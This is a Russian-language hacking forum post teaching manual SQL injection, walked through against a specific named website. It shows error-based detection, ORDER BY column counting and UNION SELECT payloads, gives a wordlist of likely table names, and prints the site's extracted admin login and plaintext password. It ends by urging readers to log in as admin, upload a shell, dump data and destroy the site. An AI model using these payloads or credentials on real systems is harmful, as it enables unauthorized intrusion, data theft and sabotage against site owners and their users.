[Руководство] Ручная раскрутка sql-инъекций

[SetFer]

Добрый вечер Ув. Жуковцы!

В связи с тем, что в последнее время произошёл резкий скачёк в популярности
использования такой программы как Havij и ей подобных, а раздел "Базы серверов и брут"
буквально ломится от баз различных сайтов/форумов(в которых редко встретишь любимый нам sha-1,в основном это md5), решил написать
краткий гайд по "РУЧНОЙ" раскрутке т.н sql-инъекций.

Начнём.

Наверняка все те,кто юзает Havij знают как ищутся дырявые php-скрипты, поэтому особого усилия на объяснения не буду прикладывать,
всё упирается в то,чтоб найти дырявый скрипт,в котором не фильтруються переменные.


Ну вот, нашли мы такую ссылку:

Код:

http://ikcnru.149.com1.ru/new.php?id=3

Как нам узнать дырявый скрипт или нет? Всё просто, ставим "'" (одинарная кАвычка)

Код:

http://ikcnru.149.com1.ru/new.php?id=3'

Если страница загрузилась без изменений, то значит хорошие были программисты, а если вылетило что-то вроде этого, в нашем случае:

Код:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38

Ура! Это и есть SQL уязвимость.
Cейчас будем пытаться вытащить с помощью этой уязвимости из базы данных логин и пасс админа.

Итак,сначало нам надо выяснить сколько полей в базе данных. Для этого используем оператор "order+by".
И так проверим сколько-же там полей используя order+by:

Код:

http://ikcnru.149.com1.ru/new.php?id=3+order+by+100 /*

*каждый запрос закрывается "/*" ,если после такого закрытия вылазит ошибка – ставим "--".

Код:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38

Данное сообщение говорит нам о том,что полей меньше 100.

Код:

http://ikcnru.149.com1.ru/new.php?id=3+order+by+10/*

Код:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38

Опять ошибка, которая нам говорит,что полей меньше 10.
После недолгих вычислений становится ясно, что полей - 5 –страница загрузилась без ошибки.

Код:

http://ikcnru.149.com1.ru/new.php?id=3+order+by+5/*

Теперь зная, что полей 5,посмотрим какое из них принтабельное, то
есть с помощью какого поля выводиться информация. Для этого нам нужно воспользоваться оператором
"union+select",составляем запрос, делаеться это так:

Код:

 
http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5/*

Когда страница загрузилась, мы видим, что появилась цифра 4, это значит,через это поле мы и будем доставать логин и пасс админа.

Первым делом узнаём версию Бд – вставляем вместо 4ки "version()":

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,version (),5/*

Что же мы видим? -- 4.1.25-log

Фигово канешн, что это бд не 5.x.xx, в которой есть т.н INFORMATION_SCHEMA, содержащая имена всех таблиц в Бд.
Если это Бд 4.х.хх, то придётся пользоваться головой.
Придётся перебирать имена таблиц ручками:

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+ [имя таблицы,которое приходит на ум]/*

Примерный список таблиц для бд меньше 5х версий:

Код:

mysql.user 4images_users account accounts admin admin1 administer administrable administrate administrator administrators administratrix admins client clients contact contacts content cpg_bridge cpg_config dbadmins dealer dealers fusion_new_users fusion_user_groups fusion_users group groups ibf_admin_sessions ibf_conf_settings ibf_member_extra ibf_members ibf_members_converge icq jos_blastchatc_users jos_comprofiler_members jos_joomblog_users jos_messages_cfg jos_moschat_users jos_users 0:kpro_adminlogs 0:kpro_user 1:login 1:logins mb_users member members minibbtable_users mybb_forums mybb_users news nuke_authors nuke_bbconfig nuke_config nuke_popsettings nuke_users obb_profiles partner partners passes password passwords phorum_users phpads_affiliates phpads_clients phpads_config phpbb_users products punbb_users pwd pwds reguser regusers sites smf_members sn_admins system usebb_members usebb_name user user_list user_logins useralbums userlist userlogins usernames users xar_roles xoops_bannerclient xoops_users yabbse_1.5.5

Если после запроса

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+ [имя таблицы,которое приходит на ум]/*

страница загрузилась без ошибок, значит,такая таблица имеется.

Не буду вас парить, интересующая нас таблица в данном примере зовётся admin).

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+admin--

Теперь проверим, существует ли запись с названием name в таблицы
admin.Это делаесть почти также, только в 4-ое поле вставляем слово name,этим мы и будем проверять
существует ли запись name в таблице admin.Этот запрос будет выглядеть так:

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,name,5+from+admin--

Ошибка - значит такого поля нету. Двигаем дальше:

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,username,5+from+admin--

Опять:

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,login,5+from+admin--

Есть такое поле.После предыдущего запроса на страничку видим что?: "admin"

Далее, пробуем найти пасс.
Также вместо 4ки пробуем вставлять интересующие нас имена полей –pass,password

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,password,5+from+admin--

Ошибка, значит такого нема.

Код:

http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,pass,5+from+admin--

Cтраница загрузилась, и что видим: "4nosferatu"

Далее,делайте что хотите. Ищите админку,
заходите под админом,заливайте шелл,сливайте что хотите,заливайте всё что хотите( куда позволено), убивайте сайт и т.д.

Впринципе все. Данный гайд был написан мной ещё примерно год назад, "адаптировал" его под Zhyk.ru
P.S
Данных гайдов полно. Видосов с использованием ручной расскрутки ещё больше.

Спасибо за внимание. Специально для Zhyk.ru



================================================== ====================
//4ipolino тему добавил в раздел мануалов [ Важные/полезные темы ] Навигация по разделу